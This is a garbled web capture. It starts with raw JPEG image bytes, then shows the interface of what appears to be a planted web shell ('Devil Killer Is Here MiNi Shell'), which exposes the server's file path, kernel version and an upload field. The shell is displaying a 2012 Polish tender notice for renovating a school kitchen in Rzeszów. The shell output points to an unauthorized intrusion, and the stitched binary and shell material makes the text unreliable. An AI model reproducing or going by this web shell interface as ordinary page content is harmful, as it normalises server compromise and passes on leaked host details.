JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120604/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120604/187154-N-2012.html

<p class="kh_header"><b>Rzeszów: Wykonanie robót remontowych w  kuchni Szkoły Podstawowej  nr 25  
                                          im.Prymasa Tysiąclecia  w Rzeszowie  przy ul. Starzyńskiego 17</b><br>
<b>Numer ogłoszenia: 187154 - 2012; data zamieszczenia: 04.06.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Szkoła Podstawowa nr 25 w Rzeszowie im. Prymasa Tysiąclecia , ul. Starzyńskiego 17, 35-508 Rzeszów, woj. podkarpackie, tel. 17 748 35 61, faks 17 748 35 86.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.sp-25.rzeszow.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: szkoła podstawowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wykonanie robót remontowych w  kuchni Szkoły Podstawowej  nr 25  
                                          im.Prymasa Tysiąclecia  w Rzeszowie  przy ul. Starzyńskiego 17.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Zakres robót obejmuje:
1.roboty remontowe pomieszczeń kuchennych  zlokalizowanych na parterze budynku szkoły polegające na:skuciu istniejących posadzek i glazury ściennej ,    wykonaniu  posadzki z płytek terrakota , obłożeniu  ścian  płytkami , wykonaniu robót malarskich,wymianie stolarki drzwiowej
2.roboty remontowe schodów zewnętrznych do budynku   polegające na :        skuciu istniejących stopni  i podestu, wykonaniu stopni schodów , ułożeniu  podestu i stopni i schodów płytkami  
3.  wymianie istniejącej instalacji wentylacji  mechanicznej  polegającej na wymianie elementów  wentylatorowni oraz wymianie okapów kuchennych ,a także spięcie nowego fragmentu instalacji z instalacją istniejąca oraz  wyposażenie układu wentylacyjnego w kompletna automatykę kontrolno-sterującą w trybie  zaprojektuj i wybuduj  obejmującej :
a. wykonanie dokumentacji  projektowej  w tym :koncepcji,projektu  budowlanego,
projektu wykonawczego, przedmiarów robot , kosztorysu, specyfikacji technicznej wykonania i odbioru robot ,dokumentacji powykonawczej  wraz  z  instrukcją eksploatacyjną, opisami zabezpieczeń fizycznych sprzętu, terminami przeglądów       
b.wykonanie wszelkich robót budowlanych oraz dostaw zgodnie z dokumentacja projektową  oraz obowiązującymi przepisami, zasadami wiedzy technicznej i sztuką budowlaną ,
c.  wszelkich  niezbędnych  prac  z  uwzględnieniem  poniesienia  wszelkich  opłat administracyjnych koniecznych do realizacji robót objętych  zamówieniem..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.11.11.00-9, 45.26.23.11-4, 45.41.00.00-4, 45.43.12.00-9, 45.26.23.20-0, 45.43.11.00-8, 45.44.21.00-8, 45.42.00.00-7, 71.32.00.00-7.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 24.08.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> zamawiajacy nie przewiduje wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>a. w  zakresie  robót określonych  w rozdziale   III. A. pkt.1 i   III.A. pkt.2 siwz Wykonawca musi wykazać wykonanie w okresie ostatnich 5 lat przed upływem   terminu składania ofert, a jeżeli  okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej 2  robót  budowlanych potwierdzających posiadanie 
niezbędnej wiedzy i doświadczenia o  wartości min. 50 000   zł brutto każda.
Uwaga: 
Za roboty potwierdzające posiadanie przez Wykonawcę niezbędnej wiedzy i  doświadczenia uważane będą roboty polegające na realizacji nowych obiektów kubaturowych lub i modernizacja, remont istniejących obiektów  kubaturowych. 
Zamówienia te winny być poparte dokumentami potwierdzającymi, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone. 

Ocena spełnienia warunku będzie dokonana wg formuły spełnia-nie spełnia. 
Kwalifikacja na podstawie zał. nr 7 i 10  do oferty.

b.w  zakresie  robót określonych  w rozdziale  III. A pkt. 3 b i  III.A.pkt. c siwz Wykonawca musi wykazać wykonanie w okresie ostatnich 5 lat przed upływem terminu   składania ofert, a jeżeli okres  prowadzenia  działalności jest krótszy - w tym okresie, co najmniej 3 robót   budowlanych   potwierdzających  posiadanie niezbędnej  wiedzy i doświadczenia o wartości min. 150 000 zł   brutto każda.
 Uwaga: 
 Za roboty potwierdzające posiadanie przez Wykonawcę niezbędnej wiedzy i doświadczenia uważane będą roboty polegające na realizacji instalacji wentylacji  mechanicznej w nowych obiektach kubaturowych lub i modernizacja, remont  w   istniejących obiektów kubaturowych.
Zamówienia te winny być poparte dokumentami potwierdzającymi, że roboty zostały  wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone. 
 Ocena spełnienia warunku będzie dokonana wg formuły spełnia-nie spełnia. 
 Kwalifikacja na podstawie zał. nr 7 i  10  do oferty.

c.w   zakresie  robót określonych  w rozdziale   III. B pkt. 3 a  siwz Wykonawca musi wykazać   wykonanie w okresie ostatnich 3 lat przed upływem terminu   składania ofert, a jeżeli  okres prowadzenia działalności   jest krótszy - w tym okresie,  co najmniej  3-ch  projektów  z zakresu  instalacji  wentylacji mechanicznej. 
Zamówienia te winny być poparte dokumentami potwierdzającymi, że roboty zostały  wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone. 

Ocena spełnienia warunku będzie dokonana wg formuły spełnia-nie spełnia. 
Kwalifikacja na podstawie zał. nr 9  i 10 a do oferty.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>a. w  zakresie  robót określonych  w rozdziale   III. A. pkt.1 i   III.A. pkt.2 siwz    Wykonawca winien wskazać do uczestniczenia w wykonywaniu niniejszego zamówienia:
1 osobę - Kierownika robót - legitymującą się uprawnieniami do pełnienia samodzielnych  funkcji  technicznych w budownictwie w specjalności konstrukcyjno - budowlanej do  kierowania robotami   budowlanymi. 
Ocena spełnienia warunku będzie dokonana wg formuły spełnia-nie spełnia. 
Kwalifikacja na podstawie zał. nr 11 i 12 do oferty.

b.w  zakresie  robót określonych  w rozdziale  III. A pkt. 3 b i  III.A. pkt c siwz Wykonawca winien wskazać  do  uczestniczenia w wykonywaniu niniejszego    zamówienia:
1osobę - Kierownika robót - legitymującą się uprawnieniami do pełnienia samodzielnych  funkcji technicznych w budownictwie  do kierowania robotami budowlanymi  w specjalności  w zakresie instalacji i urządzeń cieplnych ,wentylacyjnych i gazowych 
1osobę - Kierownika robót - legitymującą się uprawnieniami do pełnienia samodzielnych funkcji technicznych w budownictwie  do kierowania robotami budowlanymi  w specjalności instalacyjnej w zakresie sieci instalacji elektrycznych i elektroenergetycznych 

Ocena spełnienia warunku będzie dokonana wg formuły spełnia-nie spełnia. 
Kwalifikacja na podstawie zał. nr 11 i 12 do oferty.

c. w zakresie robot określonych w rozdziale III.A. pkt.3 a  siwz  Wykonawca winien wskazać do uczestniczenia w  wykonywaniu niniejszego zamówienia: 
1osobę  z  uprawnieniami do pełnienia samodzielnych funkcji technicznych w budownictwie do  projektowania w specjalności  instalacyjnej w zakresie instalacji i urządzeń cieplnych  wentylacyjnych i gazowych albo posiadającą inne uprawnienia odpowiadające powyższym, wydane na podstawie przepisów obowiązujących w dniu przyznania uprawnień,
1osobę  z  uprawnieniami do pełnienia samodzielnych funkcji technicznych w budownictwie do  projektowania w specjalności  instalacyjnej w zakresie w zakresie sieci instalacji elektrycznych  i elektroenergetycznych albo posiadającą inne uprawnienia odpowiadające powyższym,  wydane na podstawie przepisów obowiązujących w dniu przyznania uprawnień.
Ocena spełnienia warunku będzie dokonana wg formuły spełnia-nie spełnia. 
Kwalifikacja na podstawie zał. nr 11 i 12 do oferty.
 UWAGA: Zamawiający dopuszcza łączenie przez jedną osobę stanowisk przewidzianych dla  specjalistów  z wyjątkiem łączenia funkcji projektanta z funkcją kierownika   budowy, robót.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>a. Wykonawca  wykaże ,ze posiada  środki finansowe  lub zdolność   kredytową  w kwocie  nie mniejszej  niż 200 000 zł 
b. Wykonawca przedłoży opłacona polisę ,a w przypadku jej braku inny dokument potwierdzający, że  jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej  z przedmiotem zamówienia na sumę gwarancyjną nie mniejszą niż 500 000 zł 
Ocena spełnienia warunku będzie dokonana wg formuły spełnia-nie spełnia. 
Kwalifikacja na podstawie zał. nr 5 i 6 do oferty.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w których wykonawca posiada rachunek, potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>
<li id="potwierdzenia_info"><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu na zdolność finansową innych podmiotów, przedkłada informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, dotyczącą podmiotu, z którego zdolności finansowej korzysta na podstawie art. 26 ust. 2b ustawy, potwierdzającą wysokość posiadanych przez ten podmiot środków finansowych lub jego zdolność kredytową, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</p></li>
<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.Oferta winna być sporządzona na lub w oparciu o Wzór formularza oferty załącznik Nr 1 do specyfikacji oraz zawierać niżej wymienione załączniki:
Załącznik nr 1 -Zakres rzeczowo- finansowy 
Załącznik nr 2 -Oświadczenie o spełnianiu warunków udziału w postępowaniu przez Wykonawcę.
Załącznik nr 3 -Oświadczenie o braku podstaw do wykluczenia Wykonawcy z postępowania na podstawie art. 24 ust. 1 i 2 ustawy - Prawo zamówień publicznych.
Załącznik nr 4 -a. Aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, wystawiony nie wcześniej, niż 6 miesięcy przed upływem terminu składania ofert albo oświadczenie wykonawcy będącego osobą fizyczną, że nie podlega wykluczeniu z postępowania na podstawie art. 24 ust. 1 pkt 2 ustawy - Prawo zamówień publicznych.
b. Jeżeli zasady reprezentacji nie wynikają jednoznacznie z przedłożonych zgodnie z ppkt a dokumentów wymaga się złożenia dokumentu wskazującego osobę uprawnioną lub upoważnioną do reprezentowania Wykonawcy.

Załącznik nr 5 - informacje banku lub kasy oszczędnościowo-kredytowej ,w której wykonawca posiada  rachunek ,potwierdzającą  wysokość posiadanych środków finansowych lub zdolność   kredytową Wykonawcy ,wystawioną nie wcześniej niż 3 miesiące przed upływem  terminu   składania ofert  w kwocie nie mniejszej niż 200 000 zł 
Załącznik nr 6 - opłacona polisę ,a w przypadku jej braku inny dokument potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności  związanej z przedmiotem zamówienia na sumę gwarancyjną nie mniejszą niż 500 000 zł 
 Załącznik nr 7 -Wykaz wykonanych robót budowlanych określonych w rozdziale  III. A. pkt.1 i   III.A. pkt.2   s.i.w.z. z okresu ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie wg podanego wzoru Doświadczenie w zakresie wykonawstwa.
Załącznik nr 8 -Wykaz wykonanych robót budowlanych określonych w rozdziale  III. A. pkt. 3 b i   III.A. pkt.3 c   s.i.w.z. z okresu ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie wg podanego wzoru Doświadczenie w zakresie wykonawstwa.

 Załącznik nr 9 -  Wykaz wykonanych   usług  określonych w rodziale III.A.pkt 3 a  siwz w okresie ostatnich 3 lat  przed upływem terminu składania   ofert, a jeżeli    okres prowadzenia  działalności jest  krótszy - w tym okresie,  co najmniej   3-ch  projektów   z zakresu instalacji   wentylacji  mechanicznej .
Załącznik nr 10 -	Dokumenty potwierdzające, że roboty, o których mowa w załączniku nr 6,7,8  zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone.
Załącznik nr 11 -Wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia wg podanego wzoru Wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, wskazanych zgodnie z pkt. VI.2.2. s.i.w.z.   
Załącznik nr 12 - 	Oświadczenia Wykonawcy, że wykazane osoby posiadają wymagane uprawnienia, jeśli ustawa nakłada obowiązek posiadania takich uprawnień zgodne z podanym wzorem Oświadczenie o kwalifikacjach technicznych 
Załącznik nr 13 -Wykaz dokumentów zastrzeżonych, jako tajne. Objęte wykazem dokumenty stanowiące tajemnicę przedsiębiorstwa Wykonawca zamieści w oddzielnej kopercie.
Brak załącznika oznaczać będzie, że wszystkie złożone przez Wykonawcę dokumenty są jawne i mogą być udostępniane innym uczestnikom postępowania.
Załącznik nr 14 -Pisemne zobowiązanie podmiotów, o których mowa w art. 26 ust. 2b, jeśli Wykonawca polega na spełnieniu warunków udziału w postępowaniu przez te podmioty i podmioty oddają Wykonawcy do dyspozycji niezbędne zasoby na okres korzystania z nich przy wykonywaniu zamówienia.
Załącznik nr 15 -Pełnomocnictwo stosownie do postanowień zawartych w art. 23 ust. 2 ustawy Prawo Zamówień Publicznych.
2.Wymagania ogólne dotyczące sporządzenia oferty
2.1.Wykonawcy powinni przedstawić oferty zgodne z wymaganiami specyfikacji istotnych warunków zamówienia. Oferta winna zawierać wszystkie wymagane dokumenty, oświadczenia, załączniki i należy ją sporządzić na lub w oparciu o Formularz oferty. Wykonawców obowiązuje wykorzystanie załączonych wzorów załączników. Wszystkie pola i pozycje tych wzorów winny być wypełnione. 
2.2Dokumenty, o których mowa w pkt VIII.1 mogą być przedstawione w formie oryginału lub kserokopii poświadczonej za zgodność z oryginałem przez uprawnionych przedstawicieli Wykonawcy.
Oświadczenia Wykonawców np. zał. Nr 2i 3, pełnomocnictwo Wykonawców występujących wspólnie i ewentualne pełnomocnictwo dla osoby reprezentującej Wykonawcę winny być przedłożone w oryginale.
2.3.Ofertę składa się w formie pisemnej.
2.4.Zamawiający nie wyraża zgody na złożenie ofert w postaci elektronicznej.
2.5.Oferta powinna być napisana w języku polskim, trwałą i czytelną techniką np. na maszynie do pisania, komputerze, długopisem w 1 egzemplarzu. Wszystkie dokumenty w języku obcym należy załączyć wraz z ich tłumaczeniem na język polski.
2.6.Oferta, załączniki, oświadczenia muszą być podpisane przez osobę osoby uprawnione do reprezentowania  Wykonawcy.
Jeżeli zasady reprezentacji nie wynikają z przedłożonych dokumentów wymaga się złożenie dokumentu wskazującego osobę uprawnioną lub upoważnioną do reprezentowania Wykonawcy.
2.7.Wszystkie miejsca, w których Wykonawca naniósł zmiany powinny być parafowane przez osobę podpisującą ofertę. Ewentualne zmiany powinny być naniesione czytelnie.
2.8.Wykonawcy ponoszą wszystkie koszty związane ze sporządzeniem i złożeniem oferty niezależnie od wyniku postępowania przetargowego.
2.9.Wykonawca może złożyć jedną ofertę.
2.10.Wykonawca winien zgromadzić wszelkie informacje, które mogą być konieczne do przygotowania oferty na własny koszt, w tym przeprowadzić wizję lokalną. Wszystkie koszty związane z przeprowadzeniem wizji lokalnej ponosi samodzielnie każdy Wykonawca.

3.Postanowienia w przypadku złożenia oferty wspólnej przez dwóch lub więcej Wykonawców, o 	których  mowa w art. 23 ustawy Prawo zamówień publicznych
3.1.Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia.
W takim przypadku Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego.
3.2.Pełnomocnictwo do pełnienia takiej funkcji, wystawione zgodnie z wymogami prawa, podpisane przez prawnie upoważnionych przedstawicieli każdego z Wykonawców winno być dołączone do oferty.
3.3.Przedsiębiorcy prowadzący działalność w formie spółki cywilnej winni ustanowić pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego art. 23 ust. 2 Ustawy Prawo Zamówień Publicznych, ewentualnie przedłożyć umowę spółki lub Uchwałę Wspólników, określające zakres uprawnień do reprezentowania spółki przez wspólników art. 865 KC.
3.4.Zgodnie z art. 141 ustawy Prawo zamówień publicznych Wykonawcy występujący wspólnie ponoszą solidarną odpowiedzialność za wykonanie umowy.
3.5.Dokumenty, oświadczenia, załączniki do oferty powinny być podpisane przez ustanowionego pełnomocnika. Dokumenty, oświadczenia, załączniki do oferty składane oddzielnie przez każdego z Wykonawców wspólnie ubiegających się o udzielenie zamówienia, powinny być podpisane przez osobę osoby uprawnione do reprezentowania Wykonawcy, od którego pochodzą.
3.6.Kopie dokumentów i oświadczeń dotyczących każdego z wykonawców wspólnie ubiegających się o udzielenie zamówienia powinny być poświadczone za zgodność z oryginałem przez wykonawcę, którego dokument lub oświadczenie dotyczy.
3.7.Oferta winna być sporządzona wg następujących zasad:
a.formularz oferty i załączniki nr 2, 13, 15 Wykonawcy występujący wspólnie składają jako jeden łączny, podpisany przez pełnomocnika,
b.załączniki nr 3, i 4 winny pochodzić od każdego z podmiotów oddzielnie,
c.załączniki nr  5,6,7, 8, 9,10,11,12,14 : 
Ponieważ oceniane będzie łączne doświadczenie,  potencjał kadrowy i kwalifikacje  wspólnie ubiegających się o udzielenie zamówienia Wykonawców nie jest wymagane złożenie ww dokumentów przez wszystkich Wykonawców lecz dokumenty te mają obowiązek złożyć ten lub ci z Wykonawców, którzy w imieniu wszystkich wykażą spełnienie tego warunku łącznie.

4.Postanowienia w przypadku złożenia oferty przez Wykonawcę polegającego na zasobach innych podmiotów, o których mowa w art. 26 ust. 2b ustawy prawo zamówień publicznych.   
4.1.Wykonawca może polegać na wiedzy i doświadczeniu, osobach zdolnych do wykonania zamówienia innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków.
4.2.Powołując się na spełnieni warunku udziału w postępowaniu przez inny podmiot, wykonawca jest zobowiązany udowodnić zamawiającemu, że będzie dysponował zasobami niezbędnymi do realizacji zamówienia i w tym celu ma obowiązek przedstawić zobowiązanie podmiotu do udostępnienia niezbędnych zasobów stanowiące zał. Nr 14do oferty.
4.3.Kopie dokumentów dotyczących podmiotu, na którego zasoby powołuje się wykonawca powinny być poświadczone za zgodność z oryginałem przez ten podmiot.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
